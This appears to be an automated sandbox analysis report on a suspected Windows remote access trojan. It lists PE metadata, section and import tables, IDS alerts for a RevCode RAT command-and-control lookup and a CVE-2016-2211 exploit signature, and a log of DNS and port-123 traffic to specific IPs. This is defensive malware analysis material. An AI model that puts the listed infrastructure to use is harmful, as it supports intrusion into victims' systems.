                                                            SSDEEP:24576:o65HsW9xMob+T2vJN3kKnVbKep4X7gTY6bW8JNQcgNUJLB:95sSxzZVVKWQc/v
                                                            TLSH:D755AF22F6F14437C5731A3C8C2BA769982ABE107E28684A7BE41D4C5F39E417D352E7
                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                            Icon Hash:93296531faccf517
                                                            Entrypoint:0x4be23c
                                                            Entrypoint Section:CODE
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                            DLL Characteristics:
                                                            Time Stamp:0x29C6B649 [Wed Mar 18 03:17:29 1992 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:e0e0f68fc5483a21553d028d1fe27596
                                                            Instruction
                                                            push ebp
                                                            mov ebp, esp
                                                            add esp, FFFFFFF0h
                                                            mov eax, 004BDF74h
                                                            call 00007F3478FF8049h
                                                            mov eax, dword ptr [004C0B68h]
                                                            mov eax, dword ptr [eax]
                                                            call 00007F347905B369h
                                                            mov ecx, dword ptr [004C0CFCh]
                                                            mov eax, dword ptr [004C0B68h]
                                                            mov eax, dword ptr [eax]
                                                            mov edx, dword ptr [004B7E84h]
                                                            call 00007F347905B369h
                                                            mov eax, dword ptr [004C0B68h]
                                                            mov eax, dword ptr [eax]
                                                            call 00007F347905B3DDh
                                                            call 00007F3478FF5B04h
                                                            lea eax, dword ptr [eax+00h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xc20000x261a.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xd50000x6cf88.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc70000xd1c8.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0xc60000x18.rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            CODE0x10000xbd2840xbd400fbe4fd8b3404bc7961b5388b030b7e19False0.5090728719451784data6.588736337174684IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            DATA0xbf0000x1dc80x1e00a705053cfd50f3a693489a4efadd01fbFalse0.47369791666666666data4.49803816205231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            BSS0xc10000xcd10x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata0xc20000x261a0x280048d32ba38610c4bc588530be6cb78860False0.3490234375data4.880248846785967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .tls0xc50000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rdata0xc60000x180x20027f1af8b3b369969975946ea1d3ec7f2False0.05078125data0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                            .reloc0xc70000xd1c80xd200e7138711b9ed2db87426042358a95b3eFalse0.5318452380952381data6.63396083890795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                            .rsrc0xd50000x6cf880x6d000fb321da6f4e2ff1dd1c731c10f5a6a64False0.8770897541571101DIY-Thermocam raw data (Lepton 2.x), scale 10240-0, spot sensor temperature 0.000000, unit celsius, color scheme 18, minimum point enabled, calibration: offset 0.000000, slope 2417851639229258349412352.0000007.648035112047126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_CURSOR0xd63f00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                            RT_CURSOR0xd65240x134data0.4642857142857143
                                                            RT_CURSOR0xd66580x134data0.4805194805194805
                                                            RT_CURSOR0xd678c0x134data0.38311688311688313
                                                            RT_CURSOR0xd68c00x134data0.36038961038961037
                                                            RT_CURSOR0xd69f40x134data0.4090909090909091
                                                            RT_CURSOR0xd6b280x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                            RT_BITMAP0xd6c5c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                            RT_BITMAP0xd6e2c0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                            RT_BITMAP0xd70100x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                            RT_BITMAP0xd71e00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                            RT_BITMAP0xd73b00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                            RT_BITMAP0xd75800x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                            RT_BITMAP0xd77500x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                            RT_BITMAP0xd79200x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                            RT_BITMAP0xd7af00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                            RT_BITMAP0xd7cc00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                            RT_BITMAP0xd7e900xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                            RT_ICON0xd7f780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6436170212765957
                                                            RT_MENU0xd83e00x2c47dataEnglishUnited States0.8880458756065285
                                                            RT_MENU0xdb0280x2c47dataEnglishUnited States0.9384208204675782
                                                            RT_MENU0xddc700x2c47dataEnglishUnited States0.9393030436700486
                                                            RT_MENU0xe08b80x2c47dataEnglishUnited States0.937097485663873
                                                            RT_MENU0xe35000x2c47dataEnglishUnited States0.941067490074989
                                                            RT_MENU0xe61480x2c47dataEnglishUnited States0.9390383767093075
                                                            RT_MENU0xe8d900x2c47dataEnglishUnited States0.9405381561535069
                                                            RT_MENU0xeb9d80x2c47dataEnglishUnited States0.941067490074989
                                                            RT_MENU0xee6200x2c47dataEnglishUnited States0.9417732686369652
                                                            RT_MENU0xf12680x2c47dataEnglishUnited States0.9415968239964712
                                                            RT_MENU0xf3eb00x2c47dataEnglishUnited States0.9415968239964712
                                                            RT_MENU0xf6af80x2c47dataEnglishUnited States0.9414203793559771
                                                            RT_MENU0xf97400x2c47dataEnglishUnited States0.9412439347154831
                                                            RT_MENU0xfc3880x2c47dataEnglishUnited States0.9422143802382003
                                                            RT_MENU0xfefd00x2c47dataEnglishUnited States0.9417732686369652
                                                            RT_MENU0x101c180x2c47dataEnglishUnited States0.9392148213498015
                                                            RT_MENU0x1048600x2c47dataEnglishUnited States0.8683722981914425
                                                            RT_MENU0x1074a80x2c47dataEnglishUnited States0.9126599029554477
                                                            RT_MENU0x10a0f00x2c47dataEnglishUnited States0.941067490074989
                                                            RT_MENU0x10cd380x2c47dataEnglishUnited States0.9402734891927658
                                                            RT_MENU0x10f9800x2c47dataEnglishUnited States0.9423026025584473
                                                            RT_MENU0x1125c80x2c47zlib compressed dataEnglishUnited States0.9420379355977062
                                                            RT_MENU0x1152100x2c47dataEnglishUnited States0.9414203793559771
                                                            RT_MENU0x117e580x2c47dataEnglishUnited States0.9416850463167181
                                                            RT_MENU0x11aaa00x2c47dataEnglishUnited States0.9416850463167181
                                                            RT_MENU0x11d6e80x2c47dataEnglishUnited States0.9419497132774592
                                                            RT_MENU0x1203300x2c47dataEnglishUnited States0.9419497132774592
                                                            RT_MENU0x122f780x2c47dataEnglishUnited States0.9419497132774592
                                                            RT_MENU0x125bc00x2c47dataEnglishUnited States0.9414203793559771
                                                            RT_MENU0x1288080x2c47dataEnglishUnited States0.941155712395236
                                                            RT_MENU0x12b4500x2c47dataEnglishUnited States0.9415086016762241
                                                            RT_MENU0x12e0980x2c47dataEnglishUnited States0.9414203793559771
                                                            RT_MENU0x130ce00x2c47dataEnglishUnited States0.8887516541685047
                                                            RT_MENU0x1339280x2c47dataEnglishUnited States0.9369210410233789
                                                            RT_MENU0x1365700x2c47dataEnglishUnited States0.8592853992059991
                                                            RT_MENU0x1391b80x2c47dataEnglishUnited States0.8872518747243052
                                                            RT_DIALOG0x13be000x52data0.7682926829268293
                                                            RT_STRING0x13be540x1e8data0.42827868852459017
                                                            RT_STRING0x13c03c0x584data0.35127478753541075
                                                            RT_STRING0x13c5c00x57cdata0.3482905982905983
                                                            RT_STRING0x13cb3c0x40cdata0.4092664092664093
                                                            RT_STRING0x13cf480x488data0.3905172413793103
                                                            RT_STRING0x13d3d00x464data0.3371886120996441
                                                            RT_STRING0x13d8340x4d4data0.3333333333333333
                                                            RT_STRING0x13dd080x5a4data0.25069252077562326
                                                            RT_STRING0x13e2ac0x3f4data0.3893280632411067
                                                            RT_STRING0x13e6a00x1d8data0.3983050847457627
                                                            RT_STRING0x13e8780x198data0.4877450980392157
                                                            RT_STRING0x13ea100x174data0.5161290322580645
                                                            RT_STRING0x13eb840x2acdata0.47953216374269003
                                                            RT_STRING0x13ee300xe0data0.5892857142857143
                                                            RT_STRING0x13ef100x12cdata0.5533333333333333
                                                            RT_STRING0x13f03c0x290data0.4649390243902439
                                                            RT_STRING0x13f2cc0x41cdata0.37927756653992395
                                                            RT_STRING0x13f6e80x394data0.3777292576419214
                                                            RT_STRING0x13fa7c0x40cdata0.3416988416988417
                                                            RT_STRING0x13fe880x1b0data0.4675925925925926
                                                            RT_STRING0x1400380xecdata0.5508474576271186
                                                            RT_STRING0x1401240x20cdata0.5
                                                            RT_STRING0x1403300x454data0.3231046931407942
                                                            RT_STRING0x1407840x3d0data0.36168032786885246
                                                            RT_STRING0x140b540x2fcdata0.36649214659685864
                                                            RT_STRING0x140e500x354data0.318075117370892
                                                            RT_RCDATA0x1411a40x10data1.5
                                                            RT_RCDATA0x1411b40x388data0.6957964601769911
                                                            RT_RCDATA0x14153c0x527Delphi compiled form 'TForm1'0.5238817285822593
                                                            RT_GROUP_CURSOR0x141a640x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                            RT_GROUP_CURSOR0x141a780x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                            RT_GROUP_CURSOR0x141a8c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                            RT_GROUP_CURSOR0x141aa00x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                            RT_GROUP_CURSOR0x141ab40x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                            RT_GROUP_CURSOR0x141ac80x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                            RT_GROUP_CURSOR0x141adc0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                            RT_GROUP_ICON0x141af00x14dataEnglishUnited States1.1
                                                            RT_DLGINCLUDE0x141b040x239dataEnglishUnited States0.3321616871704745
                                                            RT_MANIFEST0x141d400x245XML 1.0 document, ASCII text, with CRLF line terminators0.5249569707401033
                                                            DLLImport
                                                            kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                            user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                            advapi32.dllRegQueryValueExA, RegQueryValueA, RegOpenKeyExA, RegOpenKeyA, RegEnumKeyA, RegCloseKey
                                                            kernel32.dlllstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualFree, VirtualAlloc, SleepEx, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPolyFillMode, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePen, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                                                            user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                            ole32.dllCoTaskMemFree, StringFromCLSID
                                                            kernel32.dllSleep
                                                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                            ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoTaskMemFree, CoTaskMemAlloc, CLSIDFromProgID, ProgIDFromCLSID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                                            oleaut32.dllCreateErrorInfo, GetErrorInfo, SetErrorInfo, GetActiveObject, SafeArrayCopy, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayDestroy, SafeArrayCreate, SysFreeString
                                                            comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-10-17T12:36:18.061159+02002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449730TCP
                                                            2024-10-17T12:36:57.442571+02002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449738TCP
                                                            2024-10-17T12:37:06.336578+02002032361ET MALWARE WebMonitor/RevCode RAT CnC Domain in DNS Lookup1192.168.2.4495191.1.1.153UDP
                                                            2024-10-17T12:37:48.818793+02002032361ET MALWARE WebMonitor/RevCode RAT CnC Domain in DNS Lookup1192.168.2.4498261.1.1.153UDP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 17, 2024 12:36:20.587080002 CEST5259153192.168.2.41.1.1.1
                                                            Oct 17, 2024 12:36:20.713251114 CEST53525911.1.1.1192.168.2.4
                                                            Oct 17, 2024 12:36:20.725343943 CEST6077253192.168.2.41.1.1.1
                                                            Oct 17, 2024 12:36:20.763101101 CEST53607721.1.1.1192.168.2.4
                                                            Oct 17, 2024 12:36:20.763926029 CEST60773123192.168.2.4194.58.200.20
                                                            Oct 17, 2024 12:36:21.506346941 CEST12360773194.58.200.20192.168.2.4
                                                            Oct 17, 2024 12:36:21.509265900 CEST5442353192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:22.533879995 CEST5442353192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:23.547190905 CEST5442353192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:25.551852942 CEST5442353192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:29.551846027 CEST5442353192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:33.600018978 CEST61390123192.168.2.4194.58.200.20
                                                            Oct 17, 2024 12:36:34.337924004 CEST12361390194.58.200.20192.168.2.4
                                                            Oct 17, 2024 12:36:34.339534998 CEST6054753192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:35.351449966 CEST6054753192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:36.348685980 CEST6054753192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:38.348716974 CEST6054753192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:42.211116076 CEST60548123192.168.2.4194.58.200.20
                                                            Oct 17, 2024 12:36:42.364634991 CEST6054753192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:42.947078943 CEST12360548194.58.200.20192.168.2.4
                                                            Oct 17, 2024 12:36:42.949495077 CEST5237053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:43.958719969 CEST5237053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:45.026626110 CEST5237053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:46.381371975 CEST5280753192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:47.020767927 CEST5237053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:47.402045012 CEST5280753192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:48.411377907 CEST5280753192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:50.411134958 CEST5280753192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:51.036380053 CEST5237053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:54.411277056 CEST5280753192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:36:59.449229956 CEST54641123192.168.2.4194.58.200.20
                                                            Oct 17, 2024 12:37:00.191337109 CEST12354641194.58.200.20192.168.2.4
                                                            Oct 17, 2024 12:37:00.192275047 CEST5846453192.168.2.41.2.4.8
                                                            Oct 17, 2024 12:37:00.588907003 CEST53584641.2.4.8192.168.2.4
                                                            Oct 17, 2024 12:37:00.590186119 CEST6382853192.168.2.41.2.4.8
                                                            Oct 17, 2024 12:37:01.598738909 CEST6382853192.168.2.41.2.4.8
                                                            Oct 17, 2024 12:37:01.808985949 CEST53638281.2.4.8192.168.2.4
                                                            Oct 17, 2024 12:37:02.824888945 CEST63829123192.168.2.4194.58.200.20
                                                            Oct 17, 2024 12:37:03.538239002 CEST12363829194.58.200.20192.168.2.4
                                                            Oct 17, 2024 12:37:03.541316986 CEST6526453192.168.2.4114.114.114.114
                                                            Oct 17, 2024 12:37:04.064342976 CEST5365264114.114.114.114192.168.2.4
                                                            Oct 17, 2024 12:37:04.065403938 CEST5924453192.168.2.4114.114.114.114
                                                            Oct 17, 2024 12:37:04.308197975 CEST5359244114.114.114.114192.168.2.4
                                                            Oct 17, 2024 12:37:06.336577892 CEST4951953192.168.2.41.1.1.1
                                                            Oct 17, 2024 12:37:06.431488991 CEST53495191.1.1.1192.168.2.4
                                                            Oct 17, 2024 12:37:06.438659906 CEST49520123192.168.2.4194.58.200.20
                                                            Oct 17, 2024 12:37:07.153660059 CEST12349520194.58.200.20192.168.2.4
                                                            Oct 17, 2024 12:37:07.154660940 CEST5722053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:08.145558119 CEST5722053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:09.161195040 CEST5722053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:11.162712097 CEST5722053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:15.176798105 CEST5722053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:19.177800894 CEST6401953192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:20.192552090 CEST6401953192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:21.208143950 CEST6401953192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:23.223731995 CEST6401953192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:27.239564896 CEST6401953192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:32.266598940 CEST64020123192.168.2.4194.58.200.20
                                                            Oct 17, 2024 12:37:32.992904902 CEST12364020194.58.200.20192.168.2.4
                                                            Oct 17, 2024 12:37:32.994116068 CEST6469453192.168.2.41.2.4.8
                                                            Oct 17, 2024 12:37:33.989332914 CEST6469453192.168.2.41.2.4.8
                                                            Oct 17, 2024 12:37:35.330679893 CEST6469453192.168.2.41.2.4.8
                                                            Oct 17, 2024 12:37:37.344841003 CEST6469453192.168.2.41.2.4.8
                                                            Oct 17, 2024 12:37:41.348963976 CEST6469453192.168.2.41.2.4.8
                                                            Oct 17, 2024 12:37:44.213418961 CEST53646941.2.4.8192.168.2.4
                                                            Oct 17, 2024 12:37:44.213443041 CEST53646941.2.4.8192.168.2.4
                                                            Oct 17, 2024 12:37:44.214549065 CEST6228953192.168.2.41.2.4.8
                                                            Oct 17, 2024 12:37:44.416883945 CEST53622891.2.4.8192.168.2.4
                                                            Oct 17, 2024 12:37:45.438944101 CEST62290123192.168.2.4194.58.200.20
                                                            Oct 17, 2024 12:37:46.161945105 CEST12362290194.58.200.20192.168.2.4
                                                            Oct 17, 2024 12:37:46.163115025 CEST5433853192.168.2.4114.114.114.114
